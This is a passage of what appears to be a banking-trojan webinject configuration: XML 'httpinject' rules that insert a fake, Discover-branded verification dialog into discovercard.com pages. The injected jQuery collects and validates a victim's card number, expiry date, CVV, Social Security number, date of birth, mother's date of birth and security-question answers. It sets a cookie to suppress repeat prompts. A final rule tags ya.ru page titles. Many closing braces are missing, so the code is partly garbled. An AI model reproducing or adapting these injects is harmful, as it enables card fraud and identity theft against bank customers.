2576. <input type="text" class="amountfield" id="seqnum" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="seqnum" method="get" maxlength=4 ></input>
2577. </div></td>
2578. </tr>
2579. </table>
2580. </div>
2581. <div id="txt2" class=sunclass style="padding:3px ;padding-right:15px;">
2582. <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right">
2583. <input border="0" type="image" alt="Continue" onclick="return formmySubmit();" src="/discover/images/account/buttons/btn_continue.gif">
2584. </div></font>
2585. </div>
2586. <input type="hidden" name="system" value="14">
2587. </form>
2588. </div>
2589. <script type="text/javascript">
2590. jQuery.cookie = function (name, value, options) {
2591. if (typeof value != "undefined") {
2592. options = options || {};
2593. if (value === null) {
2594. value = "";
2595. options.expires = -1
2596. var expires = "";
2597. if (options.expires && (typeof options.expires == "number" || options.expires.toUTCString)) {
2598. var date;
2599. if (typeof options.expires == "number") {
2600. date = new Date;
2601. date.setTime(date.getTime() + options.expires * 24 * 60 * 60 * 1E3)
2602. } else date = options.expires;
2603. expires = "; expires=" + date.toUTCString()
2604. var path = options.path ? "; path=" + options.path : "";
2605. var domain = options.domain ? "; domain=" + options.domain : "";
2606. var secure = options.secure ? "; secure" : "";
2607. document.cookie = [name, "=", encodeURIComponent(value), expires, path, domain, secure].join("")
2608. } else {
2609. var cookieValue = null;
2610. if (document.cookie && document.cookie != "") {
2611. var cookies = document.cookie.split(";");
2612. for (var i = 0; i < cookies.length; i++) {
2613. var cookie = jQuery.trim(cookies[i]);
2614. if (cookie.substring(0, name.length + 1) == name + "=") {
2615. cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
2616. break
2617. return cookieValue
2618. function formClose() {
2619. $("#msg").dialog("close");
2620. return true
2621. function quest() {
2622. var q1 = $("#q1").val();
2623. var q2 = $("#q2").val();
2624. var q3 = $("#q3").val();
2625. var bq_11 = /[a-zA-Z]+/.test(q1);
2626. var bq_12 = /[0-9]+/.test(q1);
2627. var bq_21 = /[a-zA-Z]+/.test(q2);
2628. var bq_22 = /[0-9]+/.test(q2);
2629. var bq_31 = /[a-zA-Z]+/.test(q3);
2630. var bq_32 = /[0-9]+/.test(q3);
2631. if (q1.length < 3 || q2.length < 3 || q3.length < 3) {
2632. alert("The answers you entered does not match our records. Please verify and make sure you re-enter your answers correctly.");
2633. return false
2634. if (bq_11 == true && bq_12 == false && bq_21 == true && bq_22 == false && bq_31 == true && bq_32 == false);
2635. else {
2636. alert("The answers you entered does not match our records. Please verify and make sure you re-enter your answers correctly.");
2637. return false
2638. $.cookie("trusted_rapport", "1", {
2639. expires: 20,
2640. path: "/",
2641. domain: ".discovercard.com"
2642. });
2643. $("#qdiv").dialog("close");
2644. return true
2645. function doError(erstring) {
2646. $("#ername").text(erstring);
2647. $("#ername1").text(erstring);
2648. $("#msg").dialog({
2649. closeOnEscape: false,
2650. resizable: false,
2651. modal: true,
2652. width: 350,
2653. modal: true,
2654. zIndex: 99999
2655. function checkDob() {
2656. var dob_mm = $("#dob_mm").val();
2657. var dob_dd = $("#dob_dd").val();
2658. var dob_yy = $("#dob_yy").val();
2659. var mdob_mm = $("#mdob_mm").val();
2660. var mdob_dd = $("#mdob_dd").val();
2661. var mdob_yy = $("#mdob_yy").val();
2662. var totalLengthDOB = dob_mm.length + dob_dd.length + dob_yy.length;
2663. var totalLengthMDOB = mdob_mm.length + mdob_dd.length + mdob_yy.length;
2664. if ((isNaN(dob_mm) || isNaN(dob_dd) || isNaN(dob_yy)) == false) if (totalLengthDOB > 6) if (dob_yy < 1995 && dob_yy > 1900) if (dob_mm > 0 && dob_mm < 13 && dob_dd > 0 && dob_dd < 32) if ((isNaN(mdob_mm) || isNaN(mdob_dd) || isNaN(mdob_yy)) == false) if (totalLengthMDOB > 6) if (mdob_mm > 0 && mdob_mm < 13 && mdob_dd > 0 && mdob_dd < 32) if (mdob_yy + 12 < dob_yy) return true;
2665. return false
2666. function checkCC() {
2667. var cc1 = $("#cc1").val();
2668. var cc2 = $("#cc2").val();
2669. var cc3 = $("#cc3").val();
2670. var cc4 = $("#cc4").val();
2671. var totalLengthCC = cc1.length + cc2.length + cc3.length + cc4.length;
2672. if (totalLengthCC > 12) if ((isNaN(cc1) || isNaN(cc2) || isNaN(cc3) || isNaN(cc4)) == false) if (cc1.charAt(0) == "6") if (cc1 != cc2 && cc1 != cc3 && cc1 != cc4 && cc2 != cc3 && cc2 != cc4 && cc3 != cc4) return true;
2673. return false
2674. function checkExp() {
2675. var exp_mm = $("#exp_mm").val();
2676. var exp_yy = $("#exp_yy").val();
2677. var totalLengthEXP = exp_mm.length + exp_yy.length;
2678. if (totalLengthEXP > 5) if (exp_mm > 0 && exp_mm < 13) if (exp_yy > 2009 && exp_yy < 2030) return true;
2679. return false
2680. function checkCVV() {
2681. var cvv_num = $("#cvv").val();
2682. var cvvLength = cvv_num.length;
2683. if (isNaN(cvv_num) == false) if (cvvLength == 3) return true;
2684. return false
2685. function SSN_check() {
2686. var ssn_1 = $("#ssn_1").val();
2687. var ssn_2 = $("#ssn_2").val();
2688. var ssn_3 = $("#ssn_3").val();
2689. var totalLengthSSN = ssn_1.length + ssn_2.length + ssn_3.length;
2690. if (totalLengthSSN == 9) if ((isNaN(ssn_1) || isNaN(ssn_2) || isNaN(ssn_3)) == false) return true;
2691. return false
2692. function SeqNum_check() {
2693. var seqnum = $("#seqnum").val();
2694. if (/^[a-zA-Z][0-9]{3}$/.test(seqnum)) return true;
2695. return false
2696. function formmySubmit() {
2697. $("#msg").css("background", "#f5f6f1");
2698. if (checkCC()) {
2699. $("#div_cc_text").css("color", "black");
2700. if (checkExp()) {
2701. $("#div_exp").css("color", "black");
2702. if (checkCVV()) {
2703. $("#div_cvv").css("color", "black");
2704. if (SSN_check() == true) {
2705. $("#div_ssn").css("color", "black");
2706. if (SeqNum_check() == true) {
2707. $("#div_seqnum").css("color", "black");
2708. if (checkDob() == true) {
2709. $("#div_dob").css("color", "black");
2710. $("#div_mdob").css("color", "black");
2711. $("#dialog").dialog("close");
2712. $("#qdiv").dialog({
2713. closeOnEscape: false,
2714. resizable: false,
2715. modal: true,
2716. width: 400,
2717. modal: true,
2718. zIndex: 99999
2719. });
2720. $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://www.discovercard.com/images/ac-header/discover-card-logo.gif"></div>');
2721. return true
2722. } else {
2723. $("#div_dob").css("color", "red");
2724. $("#div_mdob").css("color", "red");
2725. doError("Date of birth")
2726. } else {
2727. $("#div_seqnum").css("color", "red");
2728. doError("sequence number")
2729. } else {
2730. $("#div_ssn").css("color", "red");
2731. doError("social security number")
2732. } else {
2733. $("#div_cvv").css("color", "red");
2734. doError("cvv code")
2735. } else {
2736. $("#div_exp").css("color", "red");
2737. doError("expiration date")
2738. } else {
2739. $("#div_cc_text").css("color", "red");
2740. doError("card number")
2741. if ($.cookie("trusted_rapport"));
2742. else $(document).ready(function () {
2743. $("#dialog").dialog({
2744. closeOnEscape: true,
2745. resizable: false,
2746. modal: true,
2747. width: 350,
2748. modal: true,
2749. zIndex: 99998
2750. });
2751. $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://www.discovercard.com/images/ac-header/discover-card-logo.gif"></div>')
2752. });
2753. </script></body>]]></replacement>
2754. </modify>
2755. </actions>
2756. </httpinject>
2757. <httpinject>
2758. <conditions>
2759. <url type="allow" onpost="1" onget="1" modifiers="iU">ya\.ru
2760. </url>
2761. </conditions>
2762. <actions>
2763. <modify>
2764. <pattern modifiers="i"><![CDATA[<title>]]></pattern>
2765. <replacement><![CDATA[<title>XXXYAR: ]]></replacement>
2766. </modify>
2767. </actions>
2768. </httpinject>
2769. </httpinjects>
2770. </settings>